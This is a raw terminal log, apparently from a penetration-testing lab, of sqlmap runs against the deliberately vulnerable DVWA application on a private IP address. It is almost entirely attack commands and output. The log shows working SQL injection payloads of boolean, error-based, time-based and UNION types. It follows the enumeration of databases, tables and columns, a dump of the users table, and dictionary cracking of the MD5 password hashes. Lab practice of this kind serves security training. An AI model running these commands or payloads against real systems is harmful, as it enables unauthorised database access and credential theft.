┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.0.73/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=de96e4cc5c7d00436c0292c8cb25d7c4" --dbs --batch
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.9#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:20:49 /2023-10-14/

[03:20:49] [INFO] testing connection to the target URL
[03:20:50] [INFO] checking if the target is protected by some kind of WAF/IPS
[03:20:50] [INFO] testing if the target URL content is stable
[03:20:50] [INFO] target URL content is stable
[03:20:50] [INFO] testing if GET parameter 'id' is dynamic
[03:20:50] [WARNING] GET parameter 'id' does not appear to be dynamic
[03:20:50] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')                                                                                                           
[03:20:50] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[03:20:50] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[03:20:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:20:50] [WARNING] reflective value(s) found and filtering out
[03:20:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[03:20:51] [INFO] testing 'Generic inline queries'
[03:20:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[03:20:52] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[03:20:52] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[03:20:53] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Me")                                                                
[03:20:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'                                                                                                       
[03:20:53] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[03:20:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[03:20:53] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[03:20:53] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'                                                                                                           
[03:20:53] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[03:20:53] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'                                                                                                           
[03:20:53] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[03:20:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[03:20:53] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[03:20:53] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                                                                                          
[03:20:53] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                                                                                           
[03:20:53] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'                                                                                                             
[03:20:53] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[03:20:53] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[03:20:53] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable                                                                                        
[03:20:53] [INFO] testing 'MySQL inline queries'
[03:20:53] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[03:20:53] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[03:20:53] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[03:20:53] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[03:20:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[03:20:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[03:20:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[03:21:04] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[03:21:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:21:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[03:21:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[03:21:04] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[03:21:04] [INFO] target URL appears to have 2 columns in query
[03:21:04] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[03:21:04] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 160 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 7396=7396#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND ROW(9480,8697)>(SELECT COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(9480=9480,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM (SELECT 6704 UNION SELECT 1387 UNION SELECT 9105 UNION SELECT 5610)a GROUP BY x)-- xIxd&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1740 FROM (SELECT(SLEEP(5)))ESPx)-- hlnK&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7176767171,0x5456477a4979515a6d7a5767624b51576a564e4d587241686768544c66587a45676d59576c78426e,0x71766a7171),NULL#&Submit=Submit
---
[03:21:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 4.1
[03:21:04] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[03:21:04] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.0.73'

[*] ending @ 03:21:04 /2023-10-14/

                                                                                                               
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.0.73/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=de96e4cc5c7d00436c0292c8cb25d7c4" --batch -D dvwa --tables
        ___
       __H__                                                                                                   
 ___ ___[.]_____ ___ ___  {1.7.9#stable}                                                                       
|_ -| . [(]     | .'| . |                                                                                      
|___|_  [,]_|_|_|__,|  _|                                                                                      
      |_|V...       |_|   https://sqlmap.org                                                                   

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:22:49 /2023-10-14/

[03:22:49] [INFO] resuming back-end DBMS 'mysql' 
[03:22:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 7396=7396#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND ROW(9480,8697)>(SELECT COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(9480=9480,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM (SELECT 6704 UNION SELECT 1387 UNION SELECT 9105 UNION SELECT 5610)a GROUP BY x)-- xIxd&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1740 FROM (SELECT(SLEEP(5)))ESPx)-- hlnK&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7176767171,0x5456477a4979515a6d7a5767624b51576a564e4d587241686768544c66587a45676d59576c78426e,0x71766a7171),NULL#&Submit=Submit
---
[03:22:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[03:22:49] [INFO] fetching tables for database: 'dvwa'
[03:22:49] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[03:22:49] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.0.73'

[*] ending @ 03:22:49 /2023-10-14/

                                                                                                               
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.0.73/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=de96e4cc5c7d00436c0292c8cb25d7c4" --batch -D dvwa -T users --columns
        ___
       __H__                                                                                                   
 ___ ___[)]_____ ___ ___  {1.7.9#stable}                                                                       
|_ -| . [']     | .'| . |                                                                                      
|___|_  [']_|_|_|__,|  _|                                                                                      
      |_|V...       |_|   https://sqlmap.org                                                                   

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:23:17 /2023-10-14/

[03:23:17] [INFO] resuming back-end DBMS 'mysql' 
[03:23:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 7396=7396#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND ROW(9480,8697)>(SELECT COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(9480=9480,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM (SELECT 6704 UNION SELECT 1387 UNION SELECT 9105 UNION SELECT 5610)a GROUP BY x)-- xIxd&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1740 FROM (SELECT(SLEEP(5)))ESPx)-- hlnK&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7176767171,0x5456477a4979515a6d7a5767624b51576a564e4d587241686768544c66587a45676d59576c78426e,0x71766a7171),NULL#&Submit=Submit
---
[03:23:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[03:23:17] [INFO] fetching columns for table 'users' in database 'dvwa'
[03:23:18] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| user       | varchar(15) |
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user_id    | int(6)      |
+------------+-------------+

[03:23:18] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.0.73'

[*] ending @ 03:23:18 /2023-10-14/

                                                                                                               
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.0.73/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=de96e4cc5c7d00436c0292c8cb25d7c4" --batch -D dvwa -T users -C user,password,user_id --dump
        ___
       __H__                                                                                                   
 ___ ___["]_____ ___ ___  {1.7.9#stable}                                                                       
|_ -| . [.]     | .'| . |                                                                                      
|___|_  [.]_|_|_|__,|  _|                                                                                      
      |_|V...       |_|   https://sqlmap.org                                                                   

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:24:08 /2023-10-14/

[03:24:09] [INFO] resuming back-end DBMS 'mysql' 
[03:24:09] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 7396=7396#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND ROW(9480,8697)>(SELECT COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(9480=9480,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM (SELECT 6704 UNION SELECT 1387 UNION SELECT 9105 UNION SELECT 5610)a GROUP BY x)-- xIxd&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1740 FROM (SELECT(SLEEP(5)))ESPx)-- hlnK&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7176767171,0x5456477a4979515a6d7a5767624b51576a564e4d587241686768544c66587a45676d59576c78426e,0x71766a7171),NULL#&Submit=Submit
---
[03:24:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[03:24:09] [INFO] fetching entries of column(s) '`user`,password,user_id' for table 'users' in database 'dvwa'
[03:24:09] [WARNING] reflective value(s) found and filtering out
[03:24:09] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[03:24:09] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[03:24:09] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[03:24:09] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[03:24:09] [INFO] starting 4 processes 
[03:24:10] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'                       
[03:24:11] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'                      
[03:24:13] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'                      
[03:24:14] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'                     
Database: dvwa                                                                                                
Table: users
[5 entries]
+---------+---------------------------------------------+---------+
| user    | password                                    | user_id |
+---------+---------------------------------------------+---------+
| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | 1       |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   | 2       |
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | 3       |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | 4       |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | 5       |
+---------+---------------------------------------------+---------+

[03:24:18] [INFO] table 'dvwa.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.0.73/dump/dvwa/users.csv'                                                                                              
[03:24:18] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.0.73'

[*] ending @ 03:24:18 /2023-10-14/

                                                                                                               
┌──(kali㉿kali)-[~]
└─$ 
